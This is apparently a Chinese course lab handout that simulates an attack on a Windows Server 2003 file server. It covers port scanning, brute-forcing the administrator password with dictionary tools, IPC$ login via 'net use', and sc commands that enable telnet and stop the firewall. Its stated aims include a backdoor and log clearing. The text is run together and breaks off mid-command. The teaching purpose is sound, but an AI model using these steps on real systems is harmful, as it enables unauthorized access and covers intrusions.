实验五模拟黑客攻击实验环境:本例以攻击一台文件服务器为例,演示通常的攻击方法和思路
该文件服务器默认安装了windowsserver2003,启动了windows防火墙但是允许文件共享
其余设置全为默认安装设置,并安装了所有补丁
需求描述:扫描目标计算机获得管理员权限安装后门清除攻击记录实验步骤:一、扫描目标计算机a)在B计算机上使用扫描软件扫描目标计算机A,确定开放的端口,判断操作系统的类型
b)扫描软件推荐使用X-scan或流光
X-SCAN:使用流光:打开流光主界面---右击IPC主机---编辑---添加目标主机主机添加完后,生成字典---工具---字典工具---黑客字典III生成字典右击目标添加的主机---探测---探测所有IPC$远程登录配置字典探测报告二、获得管理员权限a)根据扫描结果,尝试暴力破解管理员账户的密码
b)X-scan、流光、LC5等软件都提供了暴力破解功能
破解成功后会自动生成报告
三、入侵目标计算机a)使用管理员的账户建立IPC链接,命令为"netuse\\1
1\ipc$123456/user:administrator"
b)使用SC命令获取目标计算机的所有服务列表,并保存在本地,命令为“sc\\1
1querytype=servicestate=all>c:\1
txt”c)打开1
txt文件,找到telnet,确认telnet服务的状态
d)去除telnet服务的禁用状态,设置为自动运行,命令为“sc\\1
1configtlntsvrstart=auto”
然后启用telnet服务,命令为“sc\\1
1starttlntsvr”
e)停用目标计算机的windows防火,命令为“sc\\1
1stopsharedaccess”f)确认目标计算机启用了远程注册表服务,命令为“sc\\1